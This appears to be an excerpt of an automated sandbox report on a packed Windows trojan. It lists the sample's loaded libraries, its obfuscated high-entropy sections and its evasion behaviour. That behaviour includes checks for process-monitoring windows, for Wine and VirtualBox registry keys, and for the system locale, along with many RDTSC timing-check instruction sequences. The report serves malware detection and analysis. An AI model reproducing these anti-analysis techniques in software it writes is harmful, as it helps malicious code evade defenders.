              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F1E6E0_2_011F1E6E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CBE880_2_010CBE88
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E34A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: mipucltu ZLIB complexity 0.994617362603623
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E53A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00E53A50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00E4CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\R5TONLTV.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1773568 > 1048576
              Source: file.exeStatic PE information: Raw size of mipucltu is bigger than: 0x100000 < 0x197200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mipucltu:EW;sqflgmcm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mipucltu:EW;sqflgmcm:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E56390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E56390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1b1f2b should be: 0x1b3f24
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: mipucltu
              Source: file.exeStatic PE information: section name: sqflgmcm
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 6931AAEFh; mov dword ptr [esp], edx0_2_011EE12D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push edx; mov dword ptr [esp], esi0_2_011EE14E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 6F384CFCh; mov dword ptr [esp], ecx0_2_011EE1AF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push ecx; mov dword ptr [esp], 7FF6F145h0_2_011EE217
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 3310FDA1h; mov dword ptr [esp], eax0_2_011EE257
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push eax; mov dword ptr [esp], ecx0_2_011EE3DD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 6D130989h; mov dword ptr [esp], esi0_2_011EE485
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push edx; mov dword ptr [esp], ebx0_2_011EE4CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push edx; mov dword ptr [esp], ecx0_2_011EE501
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 5C9BFF53h; mov dword ptr [esp], edx0_2_011EE53A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push ebx; mov dword ptr [esp], esi0_2_011EE55F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push eax; mov dword ptr [esp], edi0_2_011EE62C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 5E50B9C5h; mov dword ptr [esp], esp0_2_011EE644
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push ebp; mov dword ptr [esp], esi0_2_011EE709
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push eax; mov dword ptr [esp], 365F2C5Bh0_2_011EE779
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push edi; mov dword ptr [esp], ecx0_2_011EE78A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 0D823CD6h; mov dword ptr [esp], edi0_2_011EE7BD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push eax; mov dword ptr [esp], 00000093h0_2_011EE7F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push ecx; mov dword ptr [esp], 3BE989B8h0_2_011EE809
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push edi; mov dword ptr [esp], ebp0_2_011EE850
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push edi; mov dword ptr [esp], ecx0_2_011EE893
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push ebx; mov dword ptr [esp], eax0_2_011EE8E3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push esi; mov dword ptr [esp], edi0_2_011EE916
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push ebx; mov dword ptr [esp], ecx0_2_011EEA51
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push esi; mov dword ptr [esp], 19D3CF81h0_2_011EEA92
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 6CC2BA9Ch; mov dword ptr [esp], ecx0_2_011EEAFB
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push esi; mov dword ptr [esp], edx0_2_011EEB0D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push ebx; mov dword ptr [esp], edx0_2_011EEB1F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push edx; mov dword ptr [esp], eax0_2_011EEB34
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 245F360Bh; mov dword ptr [esp], ebp0_2_011EEB84
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E push 6569CA8Ch; mov dword ptr [esp], ebp0_2_011EEC2B
              Source: file.exeStatic PE information: section name: mipucltu entropy: 7.95313555425277

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E56390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E56390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26305
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FBF4C second address: 11FBFA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FD7F8DB51FFh 0x0000000c jmp 00007FD7F8DB51F5h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD7F8DB51F0h 0x00000018 jmp 00007FD7F8DB51F1h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EF59B second address: 11EF5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD7F8BAA156h 0x0000000a popad 0x0000000b jmp 00007FD7F8BAA15Ah 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAF22 second address: 11FAF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F1h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edi 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007FD7F8DB51ECh 0x00000014 pop edi 0x00000015 pushad 0x00000016 jo 00007FD7F8DB51E6h 0x0000001c jmp 00007FD7F8DB51EBh 0x00000021 popad 0x00000022 push esi 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB359 second address: 11FB35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB63C second address: 11FB64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007FD7F8DB51E6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE549 second address: 11FE5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jne 00007FD7F8BAA171h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jo 00007FD7F8BAA164h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push ecx 0x0000001d pushad 0x0000001e js 00007FD7F8BAA156h 0x00000024 push edi 0x00000025 pop edi 0x00000026 popad 0x00000027 pop ecx 0x00000028 pop eax 0x00000029 mov di, dx 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 and cx, E7C3h 0x00000035 push 00000003h 0x00000037 mov edx, dword ptr [ebp+122D3709h] 0x0000003d push D1C5D8E4h 0x00000042 jc 00007FD7F8BAA176h 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FD7F8BAA168h 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE688 second address: 11FE708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FD7F8DB51E8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 push esi 0x00000027 jmp 00007FD7F8DB51F3h 0x0000002c pop ecx 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 mov dword ptr [ebp+122D33B0h], ebx 0x00000036 mov esi, 6647C55Eh 0x0000003b popad 0x0000003c push CAEDECB3h 0x00000041 pushad 0x00000042 pushad 0x00000043 push edi 0x00000044 pop edi 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FD7F8DB51EFh 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE708 second address: 11FE74C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7F8BAA156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 351213CDh 0x00000012 add dword ptr [ebp+122D277Ch], edx 0x00000018 movsx esi, bx 0x0000001b push 00000003h 0x0000001d mov dword ptr [ebp+122D29DCh], edx 0x00000023 movsx edx, si 0x00000026 push 00000000h 0x00000028 jng 00007FD7F8BAA15Ah 0x0000002e mov si, 9525h 0x00000032 push 00000003h 0x00000034 mov dword ptr [ebp+122D1C0Ch], ebx 0x0000003a push AE490E68h 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE74C second address: 11FE750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE830 second address: 11FE8DC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD7F8BAA168h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d jmp 00007FD7F8BAA15Ch 0x00000012 pop edi 0x00000013 nop 0x00000014 jp 00007FD7F8BAA15Ch 0x0000001a and edx, dword ptr [ebp+122D36ADh] 0x00000020 mov di, cx 0x00000023 push 00000000h 0x00000025 or edi, dword ptr [ebp+122D370Dh] 0x0000002b push 115B55A6h 0x00000030 jmp 00007FD7F8BAA167h 0x00000035 xor dword ptr [esp], 115B5526h 0x0000003c mov di, dx 0x0000003f push 00000003h 0x00000041 push 00000000h 0x00000043 jmp 00007FD7F8BAA162h 0x00000048 push 00000003h 0x0000004a jmp 00007FD7F8BAA15Ch 0x0000004f call 00007FD7F8BAA159h 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FD7F8BAA162h 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE8DC second address: 11FE924 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD7F8DB51EFh 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FD7F8DB51F1h 0x00000018 mov eax, dword ptr [eax] 0x0000001a je 00007FD7F8DB51EAh 0x00000020 push esi 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE924 second address: 11FE96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FD7F8BAA156h 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f popad 0x00000010 pop eax 0x00000011 xor dword ptr [ebp+122D2F0Ah], esi 0x00000017 lea ebx, dword ptr [ebp+124523F2h] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FD7F8BAA158h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ah 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 and si, 38FDh 0x0000003c push eax 0x0000003d push ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 pop eax 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE96E second address: 11FE972 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BBB1 second address: 121BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BE76 second address: 121BE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BE7C second address: 121BE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BE80 second address: 121BEBB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD7F8DB51F9h 0x0000000a pop esi 0x0000000b jbe 00007FD7F8DB51F5h 0x00000011 jmp 00007FD7F8DB51EFh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121BEBB second address: 121BED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD7F8BAA15Ah 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C02E second address: 121C045 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C1C1 second address: 121C1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jno 00007FD7F8BAA156h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C1D3 second address: 121C1F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD7F8DB51F0h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jno 00007FD7F8DB51E6h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121C1F4 second address: 121C203 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD7F8BAA15Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA61 second address: 121CA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7F8DB51EBh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CA73 second address: 121CA80 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CC23 second address: 121CC57 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD7F8DB51E6h 0x00000008 jmp 00007FD7F8DB51ECh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jo 00007FD7F8DB51E6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 jmp 00007FD7F8DB51EEh 0x0000001d ja 00007FD7F8DB51E6h 0x00000023 popad 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CC57 second address: 121CC5C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CDB5 second address: 121CDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E89DA second address: 11E89F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA169h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CEEB second address: 121CF03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8DB51F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121CF03 second address: 121CF1D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 js 00007FD7F8BAA156h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D463 second address: 121D467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D467 second address: 121D46B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D46B second address: 121D48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D48C second address: 121D494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121D5CD second address: 121D5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FD7F8DB51E6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1221B73 second address: 1221B90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7F8BAA15Bh 0x00000007 jmp 00007FD7F8BAA15Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1221B90 second address: 1221B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC019 second address: 11EC021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC021 second address: 11EC05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7F8DB51F5h 0x00000009 jmp 00007FD7F8DB51F9h 0x0000000e popad 0x0000000f jc 00007FD7F8DB51F2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EC05C second address: 11EC062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122305A second address: 1223080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007FD7F8DB51E6h 0x0000000f jmp 00007FD7F8DB51F3h 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F5F0D second address: 11F5F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12262FA second address: 12262FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12262FF second address: 122632A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jnp 00007FD7F8BAA158h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d jbe 00007FD7F8BAA162h 0x00000023 je 00007FD7F8BAA15Ch 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122B8F2 second address: 122B8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
